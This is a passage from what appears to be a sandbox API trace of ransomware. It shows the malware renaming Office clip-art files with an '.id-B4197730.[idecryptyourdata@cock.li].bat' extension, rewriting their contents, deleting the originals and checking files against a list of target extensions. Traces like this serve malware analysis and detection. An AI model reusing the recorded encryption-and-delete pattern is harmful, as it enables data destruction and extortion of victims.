(hFile=0x384) returned 1 [0063.766] CloseHandle (hObject=0x384) returned 1 [0063.767] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.767] SetEndOfFile (hFile=0x350) returned 1 [0063.767] CloseHandle (hObject=0x350) returned 1 [0063.768] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00267_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0063.768] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00267_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00267_.wmf")) returned 1 [0063.768] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00267_.WMF") returned 68 [0063.768] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00267_.WMF") returned 68 [0063.768] lstrlenW (lpString=".doc") returned 4 [0063.768] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0063.768] lstrlenW (lpString=".docx") returned 5 [0063.768] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0063.768] lstrlenW (lpString=".pdf") returned 4 [0063.768] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0063.768] lstrlenW (lpString=".xls") returned 4 [0063.768] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0063.768] lstrlenW (lpString=".xlsx") returned 5 [0063.768] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0063.768] lstrlenW (lpString=".ppt") returned 4 [0063.768] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0063.768] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00267_.WMF") returned 68 [0063.769] lstrlenW (lpString=".zip") returned 4 [0063.769] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0063.769] lstrlenW (lpString=".rar") returned 4 [0063.769] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0063.769] lstrlenW (lpString=".bz2") returned 4 [0063.769] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0063.769] lstrlenW (lpString=".7z") returned 3 [0063.769] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0063.769] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00267_.WMF") returned 68 [0063.769] lstrlenW (lpString=".dbf") returned 4 [0063.769] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0063.769] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00267_.WMF") returned 68 [0063.769] lstrlenW (lpString=".1cd") returned 4 [0063.769] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0063.769] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00267_.WMF") returned 68 [0063.769] lstrlenW (lpString=".jpg") returned 4 [0063.769] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0063.776] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.776] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.776] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00390_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00390_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0063.779] GetLastError () returned 0x0 [0063.779] ReadFile (in: hFile=0x2c8, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x332e, lpOverlapped=0x0) returned 1 [0063.850] WriteFile (in: hFile=0x358, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x3330, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x3330, lpOverlapped=0x0) returned 1 [0063.850] ReadFile (in: hFile=0x2c8, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0063.851] WriteFile (in: hFile=0x358, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0063.851] SetEndOfFile (hFile=0x358) returned 1 [0063.851] CloseHandle (hObject=0x358) returned 1 [0063.852] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.852] SetEndOfFile (hFile=0x2c8) returned 1 [0063.852] CloseHandle (hObject=0x2c8) returned 1 [0063.853] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00390_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0063.853] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00390_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00390_.wmf")) returned 1 [0063.853] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00390_.WMF") returned 68 [0063.853] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00390_.WMF") returned 68 [0063.853] lstrlenW (lpString=".doc") returned 4 [0063.853] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0063.853] lstrlenW (lpString=".docx") returned 5 [0063.853] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0063.853] lstrlenW (lpString=".pdf") returned 4 [0063.853] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0063.854] lstrlenW (lpString=".xls") returned 4 [0063.854] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0063.854] lstrlenW (lpString=".xlsx") returned 5 [0063.854] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0063.854] lstrlenW (lpString=".ppt") returned 4 [0063.854] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0063.854] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00390_.WMF") returned 68 [0063.854] lstrlenW (lpString=".zip") returned 4 [0063.854] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0063.854] lstrlenW (lpString=".rar") returned 4 [0063.854] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0063.854] lstrlenW (lpString=".bz2") returned 4 [0063.854] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0063.854] lstrlenW (lpString=".7z") returned 3 [0063.854] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0063.854] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00390_.WMF") returned 68 [0063.854] lstrlenW (lpString=".dbf") returned 4 [0063.854] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0063.854] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00390_.WMF") returned 68 [0063.854] lstrlenW (lpString=".1cd") returned 4 [0063.854] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0063.854] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00390_.WMF") returned 68 [0063.854] lstrlenW (lpString=".jpg") returned 4 [0063.854] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0063.856] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.856] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.856] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00648_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00648_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0063.856] GetLastError () returned 0x0 [0063.856] ReadFile (in: hFile=0x354, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x2cec, lpOverlapped=0x0) returned 1 [0063.858] WriteFile (in: hFile=0x370, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x2cf0, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x2cf0, lpOverlapped=0x0) returned 1 [0063.859] ReadFile (in: hFile=0x354, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0063.859] WriteFile (in: hFile=0x370, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0063.859] SetEndOfFile (hFile=0x370) returned 1 [0063.859] CloseHandle (hObject=0x370) returned 1 [0063.860] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.860] SetEndOfFile (hFile=0x354) returned 1 [0063.861] CloseHandle (hObject=0x354) returned 1 [0063.861] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00648_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0063.861] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00648_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00648_.wmf")) returned 1 [0063.862] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00648_.WMF") returned 68 [0063.862] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00648_.WMF") returned 68 [0063.862] lstrlenW (lpString=".doc") returned 4 [0063.862] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0063.862] lstrlenW (lpString=".docx") returned 5 [0063.862] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0063.862] lstrlenW (lpString=".pdf") returned 4 [0063.862] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0063.862] lstrlenW (lpString=".xls") returned 4 [0063.862] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0063.862] lstrlenW (lpString=".xlsx") returned 5 [0063.862] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0063.862] lstrlenW (lpString=".ppt") returned 4 [0063.862] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0063.862] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00648_.WMF") returned 68 [0063.862] lstrlenW (lpString=".zip") returned 4 [0063.862] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0063.862] lstrlenW (lpString=".rar") returned 4 [0063.862] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0063.862] lstrlenW (lpString=".bz2") returned 4 [0063.862] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0063.862] lstrlenW (lpString=".7z") returned 3 [0063.862] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0063.862] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00648_.WMF") returned 68 [0063.862] lstrlenW (lpString=".dbf") returned 4 [0063.862] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0063.862] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00648_.WMF") returned 68 [0063.862] lstrlenW (lpString=".1cd") returned 4 [0063.862] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0063.862] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00648_.WMF") returned 68 [0063.862] lstrlenW (lpString=".jpg") returned 4 [0063.862] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0063.863] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.863] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.863] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00921_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00921_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0063.863] GetLastError () returned 0x0 [0063.863] ReadFile (in: hFile=0x354, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x1138, lpOverlapped=0x0) returned 1 [0063.927] WriteFile (in: hFile=0x370, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x1140, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x1140, lpOverlapped=0x0) returned 1 [0063.928] ReadFile (in: hFile=0x354, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0063.928] WriteFile (in: hFile=0x370, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0063.928] SetEndOfFile (hFile=0x370) returned 1 [0063.928] CloseHandle (hObject=0x370) returned 1 [0063.929] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.929] SetEndOfFile (hFile=0x354) returned 1 [0063.930] CloseHandle (hObject=0x354) returned 1 [0063.930] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00921_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0063.930] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00921_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00921_.wmf")) returned 1 [0063.931] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00921_.WMF") returned 68 [0063.931] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00921_.WMF") returned 68 [0063.931] lstrlenW (lpString=".doc") returned 4 [0063.931] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0063.931] lstrlenW (lpString=".docx") returned 5 [0063.931] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0063.931] lstrlenW (lpString=".pdf") returned 4 [0063.931] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0063.931] lstrlenW (lpString=".xls") returned 4 [0063.931] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0063.931] lstrlenW (lpString=".xlsx") returned 5 [0063.931] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0063.931] lstrlenW (lpString=".ppt") returned 4 [0063.931] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0063.931] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00921_.WMF") returned 68 [0063.931] lstrlenW (lpString=".zip") returned 4 [0063.931] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0063.931] lstrlenW (lpString=".rar") returned 4 [0063.931] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0063.931] lstrlenW (lpString=".bz2") returned 4 [0063.931] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0063.931] lstrlenW (lpString=".7z") returned 3 [0063.931] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0063.931] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00921_.WMF") returned 68 [0063.931] lstrlenW (lpString=".dbf") returned 4 [0063.931] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0063.931] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00921_.WMF") returned 68 [0063.931] lstrlenW (lpString=".1cd") returned 4 [0063.931] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0063.931] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00921_.WMF") returned 68 [0063.932] lstrlenW (lpString=".jpg") returned 4 [0063.932] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0063.932] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.932] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.932] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00923_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00923_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0063.932] GetLastError () returned 0x0 [0063.932] ReadFile (in: hFile=0x354, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x1870, lpOverlapped=0x0) returned 1 [0063.948] WriteFile (in: hFile=0x370, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x1880, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x1880, lpOverlapped=0x0) returned 1 [0063.949] ReadFile (in: hFile=0x354, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0063.949] WriteFile (in: hFile=0x370, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0063.949] SetEndOfFile (hFile=0x370) returned 1 [0063.949] CloseHandle (hObject=0x370) returned 1 [0063.950] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.950] SetEndOfFile (hFile=0x354) returned 1 [0063.951] CloseHandle (hObject=0x354) returned 1 [0063.951] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00923_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0063.951] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00923_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00923_.wmf")) returned 1 [0063.952] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00923_.WMF") returned 68 [0063.952] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00923_.WMF") returned 68 [0063.952] lstrlenW (lpString=".doc") returned 4 [0063.952] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0063.952] lstrlenW (lpString=".docx") returned 5 [0063.952] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0063.952] lstrlenW (lpString=".pdf") returned 4 [0063.952] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0063.952] lstrlenW (lpString=".xls") returned 4 [0063.952] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0063.952] lstrlenW (lpString=".xlsx") returned 5 [0063.952] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0063.952] lstrlenW (lpString=".ppt") returned 4 [0063.952] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0063.952] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00923_.WMF") returned 68 [0063.952] lstrlenW (lpString=".zip") returned 4 [0063.952] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0063.952] lstrlenW (lpString=".rar") returned 4 [0063.952] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0063.952] lstrlenW (lpString=".bz2") returned 4 [0063.952] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0063.952] lstrlenW (lpString=".7z") returned 3 [0063.952] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0063.953] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00923_.WMF") returned 68 [0063.953] lstrlenW (lpString=".dbf") returned 4 [0063.953] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0063.953] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00923_.WMF") returned 68 [0063.953] lstrlenW (lpString=".1cd") returned 4 [0063.953] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0063.953] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00923_.WMF") returned 68 [0063.953] lstrlenW (lpString=".jpg") returned 4 [0063.953] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0063.961] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.961] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.961] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOAT.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\boat.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0063.965] GetLastError () returned 0x0 [0063.965] ReadFile (in: hFile=0x340, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0xd16, lpOverlapped=0x0) returned 1 [0064.019] WriteFile (in: hFile=0x384, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xd20, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xd20, lpOverlapped=0x0) returned 1 [0064.020] ReadFile (in: hFile=0x340, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0064.020] WriteFile (in: hFile=0x384, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xe4, lpOverlapped=0x0) returned 1 [0064.020] SetEndOfFile (hFile=0x384) returned 1 [0064.037] CloseHandle (hObject=0x384) returned 1 [0064.038] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.038] SetEndOfFile (hFile=0x340) returned 1 [0064.038] CloseHandle (hObject=0x340) returned 1 [0064.039] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOAT.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0064.039] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOAT.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\boat.wmf")) returned 1 [0064.039] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOAT.WMF") returned 64 [0064.039] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOAT.WMF") returned 64 [0064.039] lstrlenW (lpString=".doc") returned 4 [0064.039] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0064.039] lstrlenW (lpString=".docx") returned 5 [0064.039] lstrcmpiW (lpString1=".docx", lpString2="T.WMF") returned -1 [0064.039] lstrlenW (lpString=".pdf") returned 4 [0064.039] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0064.039] lstrlenW (lpString=".xls") returned 4 [0064.039] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0064.039] lstrlenW (lpString=".xlsx") returned 5 [0064.039] lstrcmpiW (lpString1=".xlsx", lpString2="T.WMF") returned -1 [0064.039] lstrlenW (lpString=".ppt") returned 4 [0064.039] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0064.039] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOAT.WMF") returned 64 [0064.039] lstrlenW (lpString=".zip") returned 4 [0064.040] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0064.040] lstrlenW (lpString=".rar") returned 4 [0064.040] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0064.040] lstrlenW (lpString=".bz2") returned 4 [0064.040] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0064.040] lstrlenW (lpString=".7z") returned 3 